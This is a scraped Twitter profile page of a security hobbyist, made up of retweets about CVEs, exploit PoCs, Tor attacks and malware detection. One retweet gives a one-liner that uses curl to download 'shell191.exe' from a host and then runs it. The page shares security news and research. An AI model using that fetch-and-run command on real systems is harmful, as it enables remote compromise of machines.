default itsec guy

@bongoalex

just the average next door security guy

Cyberspace
Vrijeme pridruživanja: lipanj 2009.

Tweetovi

Blokirali ste korisnika/cu @bongoalex

Jeste li sigurni da želite vidjeti te tweetove? Time nećete deblokirati korisnika/cu @bongoalex

  1. proslijedio/la je Tweet
    6. velj

    on recording calls, playing doom on phones

    Prikaži ovu nit
    Poništi
  2. proslijedio/la je Tweet
    6. velj

    Running Doom is the best POC

    Poništi
  3. proslijedio/la je Tweet
    prije 18 sati

    New blog post: Critical Bluetooth Vulnerability in Android (CVE-2020-0022)

    Poništi
  4. proslijedio/la je Tweet
    prije 18 sati

    from Deanonymizing Tor Circuits: "I've seen a wide range of Tor-based attacks. I have documented many of these in various blog entries. Over the last month, I've noticed a new type of attack. It took me a while to figure out what they are trying to do"

    Poništi
  5. 5. velj

    Any of my followers at ?

    Poništi
  6. proslijedio/la je Tweet
    3. velj

    I made a PowerShell script when researching COM objects that has like 30 foreach and if loops and will search every COM object method for a keyword, e.g. finding COM objects with a method containing 'ExecuteShell'. Maybe someone else will find it useful.

    Poništi
  7. proslijedio/la je Tweet
    3. velj
    Poništi
  8. proslijedio/la je Tweet
    3. velj

    TeamViewer stored user passwords encrypted, not hashed, and the key is now public

    Poništi
  9. proslijedio/la je Tweet
    31. sij

    Exploitation paths allowing you to (mis)use the Windows Privileges to elevate your rights within the OS -

    Poništi
  10. proslijedio/la je Tweet
    1. velj
    Poništi
  11. proslijedio/la je Tweet
    31. sij

    🚨It took Kraken Security Labs just 15 minutes to hack both of ’s crypto hardware wallets. Here’s how we did it and what it means if you’re a user:

    Prikaži ovu nit
    Poništi
  12. proslijedio/la je Tweet
    30. sij
    Poništi
  13. proslijedio/la je Tweet
    30. sij
    Poništi
  14. proslijedio/la je Tweet

    🔥 CVE-2020-7247 A new critical vulnerability in the OpenSMTPD mail daemon could let remote attackers take complete control over vulnerable OpenBSD and based e-mail servers by sending specially crafted SMTP messages. Read: Patch & PoC released.

    Poništi
  15. proslijedio/la je Tweet
    28. sij
    Odgovor korisnicima

    In recent .NET code that timestamp field is by default filled with a hash of the contents, to produce deterministic binaries

    Poništi
  16. proslijedio/la je Tweet
    28. sij

    1\ Surprisingly, you could build a very mediocre PE malware detector with a single PE feature: the PE compile timestamp. In fact, I built a little random forest detector that uses only the timestamp as its feature that gets 62% detection on previously unseen malware at a 1% FPR.

    Prikaži ovu nit
    Poništi
  17. proslijedio/la je Tweet
    28. sij

    .exe is the new .exe  -   Affected systems - Windows 10 build 17063 and Later curl -O http://192.168.191.1/shell191.exe & start shell191.exe More info -

    Prikaži ovu nit
    Poništi
  18. proslijedio/la je Tweet
    28. sij

    Here's a working POC for manually performing DNS Rebinding attack. 🙂 Some people asking me for this in DM.

    Poništi
  19. proslijedio/la je Tweet
    22. sij

    Das Programm der steht. Schickes Lineup zur defensiven Cybersicherheit.👍 Wer kein Ticket für die am 7.2.-8.2. bekommen hat, kann die Streams als live feed schauen und im Nachgang die Aufzeichnungen auf sehen.

    Poništi
  20. proslijedio/la je Tweet
    23. sij

    PoC (Denial-of-Service) for CVE-2020-0609 & CVE-2020-0610 Please use for research and educational purpose only.

    Poništi

Čini se da učitavanje traje već neko vrijeme.

Twitter je možda preopterećen ili ima kratkotrajnih poteškoća u radu. Pokušajte ponovno ili potražite dodatne informacije u odjeljku Status Twittera.

    Možda bi vam se svidjelo i ovo:

    ·